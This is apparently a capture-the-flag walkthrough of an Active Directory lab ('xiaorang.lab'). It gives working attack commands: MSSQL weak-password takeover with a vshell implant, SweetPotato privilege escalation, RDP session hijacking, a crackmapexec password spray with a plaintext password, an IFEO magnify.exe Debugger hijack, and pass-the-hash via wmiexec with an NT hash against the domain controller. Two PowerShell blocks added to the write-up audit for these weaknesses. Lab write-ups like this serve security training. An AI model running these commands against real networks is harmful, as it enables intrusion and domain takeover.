With the target IP in hand, scan it first

fscan.exe -h 39.98.117.35

MSSQL-getshell

MSSQL has a weak password: connect to it directly with MDUT and push vshell straight through it.

Looking at the directory listing, the shell is low-privileged, so we need to escalate.

🥔 Potato privesc - getflag1

SweetPotato wins outright!

C:/Users/Public/Downloads/SweetPotato1.exe -a "whoami"

Run the implant again from the elevated context to get a SYSTEM shell.

flag{2ef328ee-0ff4-4c7b-bd0d-c822b73827f5}

usersession? What's that?

Tunnel + internal network recon

Keep scanning with fscan

172.22.8.18
WIN-WEB
already owned
172.22.8.15
DC:XIAORANG\DC01
Open 172.22.8.15:53
Open 172.22.8.15:88
Open 172.22.8.15:135
Open 172.22.8.15:139
Open 172.22.8.15:389
Open 172.22.8.15:445
Open 172.22.8.15:464
Open 172.22.8.15:593
Open 172.22.8.15:636
Open 172.22.8.15:3268
Open 172.22.8.15:3269
Open 172.22.8.15:3389
Open 172.22.8.15:9389
Open 172.22.8.15:15774
Open 172.22.8.15:47001
Open 172.22.8.15:49665
Open 172.22.8.15:49664
Open 172.22.8.15:49666
Open 172.22.8.15:49667
Open 172.22.8.15:49668
Open 172.22.8.15:49669
Open 172.22.8.15:51988
Open 172.22.8.15:51989
Open 172.22.8.15:51996
Open 172.22.8.15:52003
Open 172.22.8.15:52014
Open 172.22.8.15:63295
172.22.8.31
XIAORANG\WIN19-CLIENT
Open 172.22.8.31:135
Open 172.22.8.31:139
Open 172.22.8.31:445
Open 172.22.8.31:3389
Open 172.22.8.31:15774
Open 172.22.8.31:47001
Open 172.22.8.31:49664
Open 172.22.8.31:49665
Open 172.22.8.31:49666
Open 172.22.8.31:49667
Open 172.22.8.31:49668
Open 172.22.8.31:49669
Open 172.22.8.31:49673
Open 172.22.8.31:49675
Open 172.22.8.31:49676
172.22.8.46
WIN2016.xiaorang.lab
Open 172.22.8.46:80
Open 172.22.8.46:135
Open 172.22.8.46:139
Open 172.22.8.46:445
Open 172.22.8.46:3389
Open 172.22.8.46:15774
Open 172.22.8.46:47001
Open 172.22.8.46:49664
Open 172.22.8.46:49665
Open 172.22.8.46:49666
Open 172.22.8.46:49667
Open 172.22.8.46:49668
Open 172.22.8.46:49669
Open 172.22.8.46:49673
Open 172.22.8.46:49675

Nothing obvious from the scan, and this box is not domain-joined. Running my own single-host recon script shows a user john connected to this machine over RDP.

wrtbyjun.bat

Inject into one of john's processes with CS to hijack his RDP session

Run the single-host recon again

This yields a set of credentials to spray with, plus a hint.

Password spraying

proxychains crackmapexec smb 172.22.8.0/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab

(The password is single-quoted on purpose: an unquoted !# is history-expanded by interactive bash and the command would be mangled.)

The credentials appear to authenticate on all three hosts, and 3389 is open on all of them. (Note that a cme [+] only means the password is valid; admin-level access is flagged separately with Pwn3d!.)

proxychains rdesktop -u Aldrich -p 'Ald@rLMWuy7Z!#' -r disk:share=/tmp 172.22.8.31

The logon prompt says the password has expired and must be changed.

GG

proxychains rdesktop -u Aldrich -p 'Ald@rLMWuy7Z!#' -r disk:share=/tmp 172.22.8.46

We're in.

Domain recon

The WIN2016 computer account (.46) is a member of the administrators group, so getting SYSTEM on .46 is the same as owning the DC: a SYSTEM process on that host authenticates to the domain as WIN2016$, and that account has admin rights on the DC.
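The membership check above is worth automating, because a computer account sitting in a privileged group is easy to miss in a screenshot of group members. The following is an added example, not code from the original writeup: it runs from any domain-joined session (the Aldrich RDP session on .46 would do) and lists computer accounts that are direct or nested members of the default privileged groups, using only the built-in System.DirectoryServices classes. The group DNs are the Windows defaults and are an assumption for the lab; the matching-rule OID 1.2.840.113556.1.4.1941 is LDAP_MATCHING_RULE_IN_CHAIN, which follows nested group membership.

```powershell
# Added example (not from the original writeup): find machine accounts that are
# members of privileged groups. No RSAT needed; [ADSI]/DirectorySearcher are built in.
function Get-PrivilegedComputerAccount {
    $rootDse  = [ADSI]"LDAP://RootDSE"
    $domainDn = [string]$rootDse.defaultNamingContext

    # Default privileged groups (assumption: default names and containers).
    $groupDns = @(
        "CN=Domain Admins,CN=Users,$domainDn",
        "CN=Administrators,CN=Builtin,$domainDn",
        "CN=Enterprise Admins,CN=Users,$domainDn"
    )

    foreach ($groupDn in $groupDns) {
        $searcher = New-Object System.DirectoryServices.DirectorySearcher
        $searcher.SearchRoot = [ADSI]"LDAP://$domainDn"
        # objectCategory=computer restricts the result to machine accounts;
        # the :1.2.840.113556.1.4.1941: rule makes memberOf match through nested groups.
        $searcher.Filter = "(&(objectCategory=computer)(memberOf:1.2.840.113556.1.4.1941:=$groupDn))"
        [void]$searcher.PropertiesToLoad.Add('sAMAccountName')
        [void]$searcher.PropertiesToLoad.Add('dNSHostName')

        foreach ($result in $searcher.FindAll()) {
            [pscustomobject]@{
                Group   = (($groupDn -split ',')[0] -replace '^CN=')
                Account = $result.Properties['samaccountname'][0]
                Host    = $result.Properties['dnshostname'][0]
            }
        }
    }
}

Get-PrivilegedComputerAccount | Format-Table -AutoSize
```

Every account this prints is a host where local SYSTEM (or whoever can read the machine account's NT hash from LSASS or the registry) is effectively a domain admin, which is exactly the path taken in the rest of this writeup.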

Escalating on .46

Following the hint:

Do you know how to hijack Image?

Verify the vulnerability

# Check whether the ACL on the IFEO registry key is safe
Get-ACL -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl

The ACL grants write access to ordinary logged-on users, so any standard user (Aldrich included) can modify the IFEO key. By default only Administrators, SYSTEM and TrustedInstaller can write there and Users get read only; this misconfiguration is what makes the hijack possible.

Next, modify the registry to hijack Magnifier.

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

Lock the session, click the Ease of Access icon in the lower right of the logon screen and choose Magnifier. Winlogon launches the "debugger" in place of magnify.exe, so a cmd.exe pops up, running as SYSTEM.
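The two checks a defender (or a pentester cleaning up after this step) wants are the ones just performed by hand: is the IFEO key writable by low-privilege principals, and has any image already been given a Debugger. The block below is an added example, not code from the original writeup; it runs on the target host and assumes the listed principals are what counts as "low privilege" (Everyone, Users, Authenticated Users, INTERACTIVE), which is an assumption you can extend.

```powershell
# Added example (not from the original writeup): audit the IFEO key for
# (1) write access granted to low-privilege principals and
# (2) Debugger values already set under per-image subkeys.
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# Assumption: these identities are "low privilege" for this check.
$lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Any one of these rights is enough to plant a subkey or a Debugger value.
$writeRights = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, FullControl'

function Get-IfeoWeakAce {
    $acl = Get-Acl -Path $ifeo
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            (([int]$ace.RegistryRights -band [int]$writeRights) -ne 0) -and
            ($lowPriv -contains $ace.IdentityReference.Value)) {
            [pscustomobject]@{
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Get-IfeoDebugger {
    # Each subkey is named after an image; a Debugger value redirects its launch.
    Get-ChildItem -Path $ifeo | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue
        if ($props) {
            [pscustomobject]@{ Image = $_.PSChildName; Debugger = $props.Debugger }
        }
    }
}

$weak = Get-IfeoWeakAce
if ($weak) { "[!] IFEO key is writable by low-privilege principals:"; $weak | Format-Table -AutoSize }
else       { "[+] IFEO key ACL matches the default (Administrators/SYSTEM/TrustedInstaller write only)" }

$debuggers = Get-IfeoDebugger
if ($debuggers) { "[!] Debugger values present:"; $debuggers | Format-Table -AutoSize }
else            { "[+] No Debugger values under IFEO" }
```

A Debugger value is not malicious by itself (some software sets one legitimately), but an accessibility binary such as magnify.exe, sethc.exe or utilman.exe pointing at cmd.exe is the classic logon-screen backdoor and should be removed, e.g. with reg delete on the Debugger value, once the exercise is over.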

flag{86cba829-0d76-4b89-8f68-e7178893da46}

No internet egress: bring the host online in CS through a relay (pivot) listener

C:\Users\Aldrich\Desktop\beacon_x64.exe

Dumping hashes. Running as SYSTEM on .46 we grab the NT hash of the machine account WIN2016$, which sits in the admin group, and pass the hash to the DC:

image-20250928144108029

proxychains python3 wmiexec.py -hashes :7d41b1d77a426e70332f9582476460b9 xiaorang.lab/WIN2016\$@172.22.8.15

flag{029897d7-d2e9-4d4c-8f20-fef2c1ce3e2b}